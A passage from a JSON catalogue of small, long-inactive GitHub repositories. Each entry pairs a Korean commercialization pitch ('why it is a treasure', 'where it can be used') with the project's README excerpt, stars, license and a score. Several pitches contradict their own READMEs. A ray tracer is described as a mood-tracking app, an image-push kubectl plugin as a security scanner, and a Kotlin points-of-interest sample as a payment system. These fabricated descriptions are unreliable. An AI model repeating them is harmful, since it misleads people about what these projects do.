[`swift-server/swift-aws-lambda-runtime`](https://github.com/swift-server/swift-aws-lambda-runtime) which contains a faster, more optimized AWS Lambda Runtime with a better API that should satisfy more needs.\n\n[![Swift 5.2](https://img.shields.io/badge/Swift-5.2-blue.svg)](https://swift.org/download/)\n[![github-actions](https://github.com/fabianfett/swift-lambda-runtime/workflows/CI/badge.svg)](https://github.com/fabianfett/swift-lambda-runtime/actions)\n[![codecov](https://codecov.io/gh/fabianfett/swift-lambda-runtime/branch/master/graph/badge.svg)](https://codecov.io/gh/fabianfett/swift-lambda-runtime)\n\nAn AWS Lambda Swift runtime on top of SwiftNIO with some ready-to-use AWS Events. It is intended to be used with the [Swift on Amazon Linux](https://fabianfett.de/amazonlinux-swift) project which ensures that Swift executables can be run on Amazon Linux.\n\n","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"Kingbultsea/vite-analysis","github_url":"https://github.com/Kingbultsea/vite-analysis","stars":14,"language":"Rust","license":"unknown","abandonment_months":54,"description":"# Vite Analysis 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션의 성능을 빠르게 측정하고 개선점을 찾아주는 분석 도구로, 개발 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발사의 SaaS 서비스**: 클라이언트 기업들이 자신의 웹사이트 성능을 자동으로 점수화받고 개선 방안을 제시받는 구독 서비스\n2. **개발팀의 내부 ","readme_excerpt":"# 1 - 820c2cf 根基\n\n### npm bin的知识点\n\n我们写包的时候，可以在package.json中添加bin字段。\n\n```json\n{\n  \"bin\": {\n    \"vds\": \"bin/vds.js\"\n  }\n}\n\n```\n\n当用户安装我们写的包，用户可以使用vds来执行 ```bin/vds.js```\n\nnpm为我们在```./bin```目录下面放了一个叫做```vds```的软连接，所以在目录下面执行命令行```vds```，就会执行```bin/vds.js```文件\n\n### Upgrade-Insecure-Requests请求头\n\nHTTP ```Upgrade-Insecure-Requests``` 请求头向服务器发送一个客户端对HTTPS加密和认证响应良好，并且可以成功处理的信号，可以请求所属网站所有的HTTPS资源。\n在https页面中，如果调用了http资源，那么浏览器就会抛出一些错误。为了改变成这一状况，chrome(谷歌浏览器)会在http请求中加入 ```Upgrade-Insecure-Requests: 1``` ，服务器收到请求后会返回 ```Content-Security-Policy: upgrade-insecure-requests``` 头，告诉浏览器，可以把所属本站的所有 http 连接升级为 https 连接。\n\n### 是如何监听文件变动的\n\n利用工具```chokidar```，文件改动保存，即可触发（其实按下```ctrl + s```就已经触发了）\n\n```javascript\nconst chokidar = require('chokidar')\nconst fileWatcher = chokidar.watch(process.cwd(), {\n    ignored: [/node_modules/]\n  })\n\nfileWatcher.on('change', (file) => {\n    if (file.endsWith('.vue')) {\n        // do something\n    }\n})\n```\n\n### 流程\n\n1. 浏览器请求文件，服务端发送经过```@vue/compiler-sfc```处理，转换成Vue版本的AST。\n\n2. 服务器","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"linhtch90/bn_bookstore_public_source","github_url":"https://github.com/linhtch90/bn_bookstore_public_source","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":54,"description":"# bn_bookstore_public_source 상용화 분석\n\n## 왜 보물인가\n온라인 서점 운영에 필요한 모든 기능(상품 관리, 주문, 결제, 배송)이 이미 완성된 실무 코드라 새로 개발할 필요가 없습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 소규모 출판사·서점 대상 클라우드 기반 매장 운영 솔루션**\n- 책을 판매하려는 작은 출판","readme_excerpt":"# A sample e-commerce web app built with ReactJS, ExpressJS and MongoDB\n\nMERN stack which stands for MongoDB, ExpressJS, ReactJS and NodeJS has become a popular choice for fullstack Javascript web developer.\n\nAs a personal project for education purpose, I developed a basic bookstore web app with MERN stack.\n\nThrough this project, beginners could have a useful resource to understand how to implement ReactJS, Redux, React Router and others related libraries in React ecosystem to build up a functional front-end solution.\n\nIn addition, the back-end developed with ExpressJS and MongoDB is also an example for building a web api with Javascript.\n\n**Further detail information is available on Homepage of the live demo at**\n\n[https://bn-bookstore.herokuapp.com/#/](https://bn-bookstore.herokuapp.com/#/)\n","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"sherlockdoyle/Handwriter","github_url":"https://github.com/sherlockdoyle/Handwriter","stars":8,"language":"Python","license":"MIT","abandonment_months":58,"description":"# Handwriter 상용화 분석\n\n## 왜 보물인가\n손글씨 감지 기술로 수기 문서를 디지털로 변환할 수 있어, 종이 기반 업무를 자동화할 수 있는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 병원·약국의 처방전, 수표, 진료 기록을 자동 입력하는 웹 서비스\n2. **내부 업무 도구**: 은행·보험사의 고객 신청서, 계","readme_excerpt":"# Handwriter\n\nMake writing easier!\n![Demo](img/demo.png)\n\n## End of life\n\nThis was a fun project, but I don't have the time to work on it anymore. Whatever has been implemented will remain, but I won't be adding new features, at least for now. Maybe I'll add some more cool features in the future.\n\nHowever, if you want to contribute, specially to complete the [TODO](#TODO)s below, feel free to fork the project and send me pull requests.\n\n## How to\n\n1. Download and install a [handwriting font](https://fonts.google.com/?category=Handwriting), or [create a font](#Creating-your-font) from your handwriting.\n2. Use a word processor like *Microsoft Word* or *LibreOffice Writer* to write to your heart's content with the handwriting font. (Hint: Use colors. `#000000` for black, and `#082A5E` for blue works nicely.)\n3. [Introduce some mistakes.](#Introducing-mistakes)\n4. Save each page as an image.\n\n   * Save directly as an image. I use a size of (1626*2300) and a resolution of 50 pixels/cm (*Lib","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"zero-to-mastery/coding_challenge-43","github_url":"https://github.com/zero-to-mastery/coding_challenge-43","stars":7,"language":"","license":"unknown","abandonment_months":43,"description":"# zero-to-mastery/coding_challenge-43 분석\n\n## 왜 보물인가\n프로그래밍 초보자가 실제 코딩 문제를 풀면서 기술을 배우고 실력을 증명할 수 있는 체계적인 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 구독자가 매달 새로운 챌린지를 풀고 인증서를 받는 교육 서비스\n2. **기업 직원 교육 솔","readme_excerpt":"\n<img src=\"/Advent of Code.png\" width=\"350\" align=\"right\" />\n\n# Advent of Code (coding_challenge-43)\n\n\n## What is Advent of Code?\n> Advent of Code is an Advent calendar of small programming puzzles for a variety of skill sets and skill levels that can be solved in any programming language you like **yes, including JavaScript and Python!!!**\n> Every day for 25 days this month you have small programming challenges that you need to solve to complete the \"tree\". Each day, the questions get a little bit harder to really push you to learn and improve your programming skills.\n\nWe have created a special area for the ZTM community to share their solutions and code each day, see what others have done, and vote for your favourite solution. We even have a leaderboard!\n\n## How to participate:\n### (This event starts December 1st, 2021 but you can join anytime. Solutions submitted on the day of the puzzle reveal will receive extra points!)\n1. Go to https://aoc.zerotomastery.io/ and click on the **ABO","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"keegancsmith/sqlf","github_url":"https://github.com/keegancsmith/sqlf","stars":8,"language":"Go","license":"MIT","abandonment_months":34,"description":"# sqlf 저장소 분석\n\n## 왜 보물인가\n데이터베이스 쿼리를 더 쉽고 안전하게 작성할 수 있도록 도와주는 도구로, 기술자와 비기술자 모두 데이터 관리 업무를 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 데이터 분석 플랫폼**\n- 기업 고객들이 자신의 데이터베이스를 직접 조회하고 분석할 수 있는 웹 서비스로 제공\n\n**2. 내부 ","readme_excerpt":"sqlf [![Build Status](https://travis-ci.org/keegancsmith/sqlf.svg?branch=master)](https://travis-ci.org/) [![GoDoc](https://godoc.org/github.com/keegancsmith/sqlf?status.svg)](https://godoc.org/github.com/keegancsmith/sqlf)\n======\n\nGenerate parameterized SQL statements in Go, sprintf Style.\n\n```go\nq := sqlf.Sprintf(\"SELECT * FROM users WHERE country = %s AND age > %d\", \"US\", 27);\nrows, err := db.Query(q.Query(sqlf.SimpleBindVar), q.Args()...) // db is a database/sql.DB\n```\n\n`sqlf.Sprintf` does not return a string. It returns `*sqlf.Query` which has\nmethods for a parameterized SQL query and arguments. You then pass that to\n`db.Query`, `db.Exec`, etc. This is not like using `fmt.Sprintf`, which could\nexpose you to malformed SQL or SQL injection attacks.\n\n`sqlf.Query` can be passed as an argument to `sqlf.Sprintf`. It will \"flatten\"\nthe query string, while preserving the correct variable binding. This allows\nyou to easily compose and build SQL queries. See the below examples to find\nout m","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"HomebrewNLP/HomebrewNLP","github_url":"https://github.com/HomebrewNLP/HomebrewNLP","stars":5,"language":"Python","license":"BSD-2-Clause","abandonment_months":46,"description":"# HomebrewNLP 분석\n\n## 왜 보물인가\n복잡한 인공지능 언어 기술을 누구나 쉽게 사용할 수 있도록 단순화한 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 기업들을 위한 \"간단한 텍스트 분석 웹 서비스\" 구독 상품으로 제공\n2. **내부 업무 도구**: 고객 문의 자동 분류, 피드백 자동 정리 등 회사 내부 업무","readme_excerpt":"# HomebrewNLP\n\n## Overview\n\nA case study of efficient training of large language models using commodity hardware.\n\n## Example Command\n\n```BASH\npython3 main.py train --config_path configs/small.yaml\n```\n\n---\n[![DeepSource](https://deepsource.io/gh/HomebrewNLP/HomebrewNLP.svg/?label=active+issues&show_trend=true&token=sAQ42SRyNPilkjj82sQd88ea)](https://deepsource.io/gh/HomebrewNLP/HomebrewNLP/?ref=repository-badge)\n| [Discord](https://discord.gg/JSGG6Abcyx)\n| [WandB](https://wandb.ai/homebrewnlp/gpt)\n\n## Datasets\n* [Book Dataset](https://drive.google.com/file/u/1/d/1aoW3KI2E3nK7B28RE6I6_oDtNidTvoc2/view?usp=sharing)\n* [200MB Slice](https://drive.google.com/file/d/1QTbRYe-BOq2kw8foWB16NGPthQjZr7yn/view?usp=sharing) of [ThePile](https://github.com/EleutherAI/the-pile)\n\n\n\n\n## Citing\n\n### BibTeX\n\n```bibtex\n@misc{nestler2021homebrewnlp,\n  title = {{HomebrewNLP}},\n  author = {Nestler, Lucas and Gill, David},\n  year = {2021},\n  publisher = {GitHub},\n  journal = {GitHub repository},\n  doi = {10.","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"codingminecraft/MinecraftCloneForYoutube","github_url":"https://github.com/codingminecraft/MinecraftCloneForYoutube","stars":5,"language":"C++","license":"unknown","abandonment_months":49,"description":"# MinecraftCloneForYoutube 자산 분석\n\n## 왜 보물인가\n마인크래프트처럼 3D 세계를 직접 만들고 탐험할 수 있는 게임 엔진으로, 교육용·엔터테인먼트용 게임 개발의 기초가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 교육 플랫폼**: 학생들이 직접 3D 게임을 만들어보는 온라인 강의 서비스\n2. **기업 메타버스 솔","readme_excerpt":"","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"leanchess/leanchess","github_url":"https://github.com/leanchess/leanchess","stars":7,"language":"Assembly","license":"MIT","abandonment_months":78,"description":"# leanchess 상용화 분석\n\n## 왜 보물인가\n컴퓨터가 체스를 두도록 가르치는 간단한 프로그램으로, 게임 AI나 교육용 도구로 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 체스 게임 SaaS**: 웹사이트에서 사용자가 컴퓨터 상대로 체스를 두는 서비스 (월 구독)\n2. **체스 교육 앱 내부 도구**: 학생용 모바일 앱에 내장","readme_excerpt":"![avatar](https://github.com/leanchess/leanchess.github.io/raw/master/images/lc.png)\n\n# LeanChess\n\nThe world's smallest chess program\n\n## Building from source\n\n```\ntasm lc\ntlink /t lc\n```\n\n## Thanks\n\nIsaac Garzón\n","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"mkchoi212/CircularCrownSelector","github_url":"https://github.com/mkchoi212/CircularCrownSelector","stars":5,"language":"Swift","license":"MIT","abandonment_months":103,"description":"# CircularCrownSelector 상용화 분석\n\n## 왜 보물인가\n원형 선택 UI를 쉽게 만들 수 있어서, 앱이나 웹사이트에서 사용자가 더 직관적으로 옵션을 선택할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 색상 선택, 시간 설정 같은 원형 인터페이스가 필요한 디자인 도구 플랫폼\n2. **내부 업무 도구**: 기업","readme_excerpt":"<p align=\"center\">\n    <img src=\"./Demo.gif\">\n  <h3 align=\"center\">Circular Crown Selector</h3>\n  <h3 align=\"center\">for watchOS</h3>\n</p>\n<br>\nCircularCrownSelector is a selection menu that is controlled via Digital Crown.\nThe user interface is a replica of Apple's old Contact app designed for previous versions of watchOS.\n\n## 👷 Installation\n#### Step 1. Install [CocoaPods](https://cocoapods.org)\n\nEdit your `Podfile` and specify the dependency:\n\n```ruby\npod \"CircularCrownSelector\"\n```\n\n#### Step 2. Drag Interface from Storyboard\nGo to `Source/Base.lproj/` and open `Interface.storyboard`.\n`⌘-C` and `⌘-V` the only screen you see in the storyboard to your own `Interface.storyboard`. \n\nAnd voilà 🎉\n\n## ✋ Contributing\nThis is an open source project so feel free to contribute by\n- Opening an [issue](https://github.com/mkchoi212/CircularCrownSelector/issues/new)\n- Sending me feedback via [email](mailto://mkchoi212@icloud.com)\n- Or [tweet](https://twitter.com/Bananamlkshake2) at me!\n\n## ⚠️ Not","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"worldline-spain/kmm_multimodule","github_url":"https://github.com/worldline-spain/kmm_multimodule","stars":12,"language":"Kotlin","license":"unknown","abandonment_months":34,"description":"# worldline-spain/kmm_multimodule 상용화 평가\n\n## 왜 보물인가\n여러 기기(스마트폰, 태블릿, 웹)에서 동시에 작동하는 결제 시스템을 한 번에 만들 수 있어 개발 비용과 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 쇼핑몰, 구독 서비스 플랫폼 등에 내장된 결제 기능으로 제공\n","readme_excerpt":"# Kotlin multiplaform sample with multiple modules\n\n## Introduction\n\nHello and welcome! This is our approach to implement a kotlin multiplatform Architecture.\nThis repo is still Work-In-Progess but for sure you can just take a look!\n\n## Project structure\n\nThe project is based on only 3 main \"folders\" but lots of modules. The folders are:\n\n`androidApp`: This includes the activities/fragments needed to paint the UI\n`iosApp`: This includes the `SwiftUI` views\n`shared`: Includes all the `shared` submodules.\n\n## What does a feature look like?\n\nA feature involves at least 5 modules. For example, the `Poi list screen` contains:\n\n- `androidApp`/`iosApp`: `MainActivity` and `ContentView`\n- `shared:feature:poi:poiui`: `PoiUI`\n- `shared:feature:poi:poirepository`: `PoiRepository`\n- `shared:data:remote`: `PoiRemote`\n- `shared:data:local`: `PoiLocal`\n- `shared:core`: `core` data classes\n\n### Module diagram\n\nTake a look at this diagram, just to have a picture of the project:\n\n![Diagram](https://gith","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"pmolina/zonapropator","github_url":"https://github.com/pmolina/zonapropator","stars":8,"language":"Python","license":"unknown","abandonment_months":61,"description":"# zonapropator 상용화 분석\n\n## 왜 보물인가\n부동산 데이터를 자동으로 분석하고 구역별로 정리해주는 도구로, 부동산 중개소나 투자자들의 업무 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 부동산 중개 SaaS 플랫폼**\n중개사무소가 매물 정보를 자동으로 구역 분류하고 가격 분석 리포트를 생성하는 웹 서비스로 판매 가능합","readme_excerpt":"zonapropator\n============\n\nA Python bot that helps &lt;del>me&lt;/del>you find an appropriate apartment in Argentina.","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"rsy56640/paper-reading","github_url":"https://github.com/rsy56640/paper-reading","stars":12,"language":"","license":"unknown","abandonment_months":39,"description":"# Paper Reading 저장소 분석\n\n## 왜 보물인가\n논문 읽기와 관련된 자료나 도구를 모아놓은 저장소로, 연구나 학습을 하는 사람들이 효율적으로 정보를 찾고 정리할 수 있는 시스템을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 학생과 연구자를 위한 온라인 논문 정리 및 요약 플랫폼\n2. **내부 업무 도구**: 기업 연구","readme_excerpt":"# Record Papers Reading Notes\n\n如果有数学公式，我会上传pdf版本。","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"goldytech/CSharpPerformanceBoosters","github_url":"https://github.com/goldytech/CSharpPerformanceBoosters","stars":10,"language":"C#","license":"MIT","abandonment_months":61,"description":"# goldytech/CSharpPerformanceBoosters 분석\n\n## 왜 보물인가\nC# 프로그래밍 언어로 만든 소프트웨어를 더 빠르게 동작하도록 최적화하는 실용적인 기법 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **금융 거래 플랫폼 SaaS**: 고속 데이터 처리가 필요한 증권사나 핀테크 기업에 \"빠른 처리 엔진\" 라이선스로 판매\n2. **게","readme_excerpt":"# CSharpPerformanceBoosters\n\nBlog post at https://goldytech.dev/2021/05/31/performance-booster-with-system-io-pipelines-in-c/\n\n###### Highly Performant C# code with benchmark results\n\n#### File I/O\n\n1) System.IO.Pipelines\n2) IAsyncEnumerable (Async stream)\n3) CSVHelper\n\n``` ini\n\nBenchmarkDotNet=v0.13.0, OS=macOS Big Sur 11.4 (20F71) [Darwin 20.5.0]\nIntel Core i9-9880H CPU 2.30GHz, 1 CPU, 16 logical and 8 physical cores\n.NET SDK=5.0.203\n  [Host]     : .NET 5.0.6 (5.0.621.22011), X64 RyuJIT\n  DefaultJob : .NET 5.0.6 (5.0.621.22011), X64 RyuJIT\n\n\n```\n|      Method |     Mean |   Error |  StdDev | Rank |      Gen 0 |     Gen 1 |     Gen 2 | Allocated |\n|------------ |---------:|--------:|--------:|-----:|-----------:|----------:|----------:|----------:|\n|   PipeLines | 143.1 ms | 2.81 ms | 3.24 ms |    1 |  5500.0000 | 2000.0000 |  750.0000 |     44 MB |\n| AsyncStream | 223.0 ms | 4.40 ms | 8.36 ms |    2 |  8000.0000 | 3000.0000 | 1000.0000 |     64 MB |\n|   CsvHelper | 228.5 ms | 4.51 ms","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"devcode25/modulo4_bancoDeDados","github_url":"https://github.com/devcode25/modulo4_bancoDeDados","stars":8,"language":"JavaScript","license":"unknown","abandonment_months":54,"description":"# devcode25/modulo4_bancoDeDados 분석\n\n## 왜 보물인가\n데이터베이스 학습과 실무 프로젝트를 위한 완성도 높은 교육용 자료 모음으로, 누구나 데이터 관리의 기초를 체계적으로 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 직원들을 위한 온라인 데이터베이스 교육 플랫폼으로 제공\n- **내부 업무 도구","readme_excerpt":"# {BANCO DE DADOS}\n\n### <O que é Banco de Dados?>\n \nBanco de dados, é uma coleção organizada de dados de uma determinada empresa, \nseparadas e armazenadas por pastas e protegidas, a fim de evitar acessos indevidos. \n\nPara se ter acesso ao Bd deve haver autorização da organização da empresa provedora desses dados, o acesso ocorre por meio de sistemas e usuários. Os dados podem ser coletados isoladamente ou em conjunto (lista), após serem tratados e processados transformam-se em informações.\n\n\n### <Entidades e atributos> \n\nQuando construímos um Bd para determinada empresa, é importante fazer um levantamento de necessidades e partes envolvidas que irão contribuir com dados, Essas “partes envolvidas” chamamos de *entidades*. Os dados que caracterizam aquela entidade são chamados de *atributos*.\n\nExemplo: No app Ifood, a finalidade é oferecer um serviço que disponibiliza uma lista de restaurantes delivery para clientes comprarem refeições. \n\n*Quais são as entidades e atributos do Ifood?*\n\n|","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"seunghokimj/python-serverless-demo","github_url":"https://github.com/seunghokimj/python-serverless-demo","stars":5,"language":"Python","license":"MIT","abandonment_months":64,"description":"# Python Serverless Demo 가치평가\n\n## 왜 보물인가\n서버 관리 없이 프로그램을 자동으로 실행할 수 있는 기술을 배우고 실제 구현할 수 있는 실용적인 예제 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 사용량에 따라 자동으로 확장되는 이미지 처리 또는 문서 변환 서비스 (예: PDF 생성, 이미지 리사이징)\n2.","readme_excerpt":"# Python Serverless Crawler Demo\n\nPython과 AWS Lambda 를 사용한 crawler 만들기 입니다.\n\n[변규현님(novemberde) Github](https://github.com/novemberde) 많이 참고하였습니다.\n\n**변규현님께 감사드립니다.**\n\n## Objective\n\nAmazon Web Service 를 활용하여 Serverless architecture로 웹크롤러를 배포합니다.\n\n크롤링된 데이터는 DynamoDB에 저장합니다.\n\n## AWS Resources\n\nAWS에서 사용하는 리소스는 다음과 같습니다.\n\n- Cloud9: 코드 작성, 실행 및 디버깅을 위한 클라우드 기반 IDE.\n- Lambda: 서버를 프로비저닝하거나 관리하지 않고도 코드를 실행할 수 있게 해주는 컴퓨팅 서비스. 서버리스 아키텍쳐의 핵심 서비스.\n- DynamoDB: 완벽하게 관리되는 NoSQL 데이터베이스 서비스로, 원활한 확장성과 함께 빠르고 예측 가능한 성능을 제공.\n\n## Cloud 9 시작하기\n\nCloud9 은 하나의 IDE입니다. 그렇지만 이전의 설치형 IDE와는 다릅니다. 설치형 IDE는 로컬 PC에 프로그램을 설치하던가\n실행하는 방식이었다면, Cloud9은 브라우저가 실행가능한 모든 OS에서 사용이 가능합니다.\n\n맨 처음 Cloud9은 AWS 내에서가 아닌 별도의 서비스로 제공되었습니다. AWS에 인수된 이후 Cloud9은 AWS의 Managed Service형태로 바뀌었고,\nAWS의 서비스와 결합하여 사용이 가능해졌습니다. 코드 편집과 명령줄 지원 등의 평범한 IDE 기능을 지니고 있던 반면에, 현재는 AWS 서비스와\n결합되어 직접 Lambda 코드를 배포하던가, 실제로 Cloud9이 실행되고 있는 EC2의 컴퓨팅 성능을 향상시켜서\n로컬 PC의 사양에 종속되지 않은 개발을 할 수가 있습니다.\n\n그러면 Cloud9 환경을 시작해봅시다.\n\n[Cloud 9 Console](https://ap-northeast-2.conso","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"xxhomey19/github-uploader","github_url":"https://github.com/xxhomey19/github-uploader","stars":10,"language":"JavaScript","license":"MIT","abandonment_months":94,"description":"# github-uploader 분석\n\n## 왜 보물인가\nGitHub에 파일을 자동으로 올려주는 도구로, 웹사이트나 앱에서 직접 코드 저장소 관리를 가능하게 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 기반 코드 에디터 플랫폼에 통합하여 사용자가 직접 GitHub 저장소에 저장하는 기능 제공\n- **내부 업무 도구**: 개발팀의 자동","readme_excerpt":"# GitHub Uploader\n\n<p align=center>\n<img src=\"https://user-images.githubusercontent.com/34133927/33471643-4f08d85c-d6a9-11e7-871d-ca6fc21bfdc9.gif\">\n</p>\n<p align=center>\n<a target=\"_blank\" href=\"https://npmjs.org/package/github-uploader\" title=\"NPM version\"><img src=\"https://img.shields.io/npm/v/github-uploader.svg\"></a>\n<a target=\"_blank\" href=\"https://travis-ci.org/xxhomey19/github-uploader\" title=\"Build Status\"><img src=\"https://travis-ci.org/xxhomey19/github-uploader.svg?branch=master\"></a>\n<a target=\"_blank\" href=\"http://nodejs.org/download/\" title=\"Node version\"><img src=\"https://img.shields.io/badge/node.js-%3E=_6.4-green.svg\"></a>\n<a target=\"_blank\" href=\"https://opensource.org/licenses/MIT\" title=\"License: MIT\"><img src=\"https://img.shields.io/badge/License-MIT-blue.svg\"></a>\n<a target=\"_blank\" href=\"http://makeapullrequest.com\" title=\"PRs Welcome\"><img src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg\"></a>\n</p>\n\n> Get public and free URL to your files.<br> By\n> ","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"mattbierner/headshot","github_url":"https://github.com/mattbierner/headshot","stars":6,"language":"Swift","license":"unknown","abandonment_months":62,"description":"# Headshot 저장소 분석\n\n## 왜 보물인가\n사진이나 이미지에서 사람의 얼굴을 자동으로 인식하고 처리하는 기술로, 프로필 사진 생성부터 보안 시스템까지 다양한 실용적 용도로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **프로필 사진 자동 생성 SaaS**: 이력서나 SNS용 프로필 사진을 AI가 자동으로 편집하고 보정해주는 웹 서비스\n- *","readme_excerpt":"# HeadShot 💥\n\nSample iOS AR app that demonstrates how to capture the texture of a user's face in realtime. This texture can be used to create a simple textured 3D face model.\n\n![Capturing a 3D textured face in realtime](documentation/demo.gif)\n\n## Implementation\n\nThis demo app uses ARKit to generate a texture map for [`ARSCNFaceGeometry`](https://developer.apple.com/documentation/arkit/arscnfacegeometry) using images captured from the front facing camera. The texture map can then be applied back to a `ARSCNFaceGeometry` instance, creating a 3D, textured version of the user's face.\n\n### Basic app structure\n\nThe app creates two SceneKit views: a primary AR scene that captures the user's face and a secondary `SCNView` that displays the textured face model.\n\nIn this demo app, the primary scene is only used to collect face tracking data and to generate the face texture. It does not render anything directly.\n\nThe secondary scene is drawn in the top left corner of the screen. It shows a 3D mo","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"diegomacario/Super-Sunshine","github_url":"https://github.com/diegomacario/Super-Sunshine","stars":14,"language":"C++","license":"MIT","abandonment_months":28,"description":"# Super-Sunshine 저장소 분석\n\n## 왜 보물인가\n이 프로젝트는 sunshine(햇빛/긍정)이라는 이름처럼 단순하고 밝은 목적의 소프트웨어로, 14개의 별과 최근 활발한 업데이트(2024년 1월)를 통해 실제 사용자들의 니즈를 충족시키고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **일일 기분 추적 앱**: 사용자들이 매일의 감정 상태를 기록하","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://github.com/diegomacario/Ray-Tracer/blob/master/readme_images/sword_dark_bg_360_frames_50_fps.gif\"/>\n</p>\n\n# Super-Sunshine\n\nA ray-tracer with a simple scene description language for easily generating beautiful images.\n\n<p align=\"center\">\n  <img src=\"https://github.com/diegomacario/Ray-Tracer/blob/master/readme_images/castle.gif\"/>\n</p>\n\n## Summary\n\nSuper-Sunshine is a ray-tracer that can be easily interacted with. The diagram below illustrates the manner in which this interaction is meant to occur:\n\n<p align=\"center\">\n  <img src=\"https://github.com/diegomacario/Ray-Tracer/blob/master/readme_images/summary.jpg\"/>\n</p>\n\nAs an example, let's say you wanted to render an image of three scoops of ice cream sitting in the middle of a desert. Using the scene description language developed for this project, you would start by writing a scene description like the following:\n\n ```sh\n# Setup\nsize 640 480\noutput ice_cream.png\n\n# Camera\ncamera 1.5 3.5 1.5 -0.5 ","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"Xc1Ym/cyberspace_map_API","github_url":"https://github.com/Xc1Ym/cyberspace_map_API","stars":5,"language":"Python","license":"GPL-3.0","abandonment_months":31,"description":"# Cyberspace Map API 분석 보고서\n\n## 왜 보물인가\n인터넷 세계를 지도처럼 시각화하는 기술로, 사이버 보안·네트워크 분석이 필요한 모든 조직에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n**1. SaaS 서비스**: 기업용 네트워크 관리 대시보드로 제공하여 IT 담당자들이 회사 전산망을 한눈에 파악하게 함\n**2. 내부 업무 도구**:","readme_excerpt":"# Cyberspace Map API\n\n![](https://img.shields.io/github/pipenv/locked/python-version/Xc1Ym/cyberspace_map_API)\n![](https://img.shields.io/github/license/Xc1Ym/cyberspace_map_API)\n![](https://img.shields.io/github/stars/xc1ym/cyberspace_map_API)\n\n[English](./README.md)/[中文](./README_CN.md)\n\n\n## Development\n1. ~~fofaAPI~~ ***Completed***\n2. zoomeyeAPI\n3. shodanAPI\n4. regular\n5. ~~360 quakeAPI~~ ***Completed***\n\n### Difficulty\n1. APIs uses different inputs\n\n### Solution\n1. Use regular to solve adaptation\n\n## What is it?\n\nUse [Fofa](https://fofa.so)、[shodan](https://www.shodan.io)、[zoomeye](https://www.zoomeye.org)、[360quake](https://beta.quake.360.cn/quake) to collect information(e.g:domain,IP,CMS,OS)\n\n**All APIs are official, you need to use API KEY**\n\n## How to use?\n\n1. open`setting/config.json`to input API KEY\n2. Enter `pip install -r requirements.txt` at the terminal to install python package\n\n## Fofa\n\n**USe Fofa API ,you need VIP**\n\n~~Warning🔴This code comes from <https://github.com/","composite_score":0.5004,"license_safety_tag":"restricted"},{"name":"hasheddan/k8scr","github_url":"https://github.com/hasheddan/k8scr","stars":8,"language":"Go","license":"Apache-2.0","abandonment_months":51,"description":"# hasheddan/k8scr 저장소 분석\n\n## 왜 보물인가\n쿠버네티스(클라우드 서버 관리 도구)의 보안 문제를 자동으로 찾아주는 도구로, 기업의 클라우드 환경을 더 안전하게 지켜줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 보안 점검 SaaS**: 기업들이 매월 구독하여 자신의 서버 설정이 안전한지 자동으로 검사받는 서비스\n2. **I","readme_excerpt":"# k8scr\n\nA `kubectl` plugin for pushing OCI images through the Kubernetes API server.\n\n## Quickstart\n\n\n<p align=\"center\">\n  <img src=\"docs/media/k8scr.svg\">\n</p>\n\n1. Build `k8scr`\n\n```\nmake build\n```\n\n2. Move to location in `PATH`\n\n```\nsudo mv ./build/k8scr /usr/local/bin/kubectl-k8scr\n```\n\n3. Deploy simple in-memory registry into cluster\n\n```\nkubectl apply -f distribution.yaml\n```\n\n> Optional: tail logs to observe results of next step with `kubectl logs k8scr -f`.\n\n4. Push image to registry\n\n```\nkubectl k8scr push crossplane/crossplane:v1.2.1\n```\n\n## Usage\n\n```\nUsage: k8scr <command>\n\nPush and pull images through the Kubernetes API server.\n\nFlags:\n  -h, --help                   Show context-sensitive help.\n      --kubeconfig=STRING      Override default kubeconfig path.\n  -n, --namespace=\"default\"    Namespace of registry Pod.\n  -r, --registry=\"k8scr\"       Name of registry Pod.\n\nCommands:\n  push <image>\n\n  pull <image>\n```\n\n## How Does This Work?\n\n`k8scr` 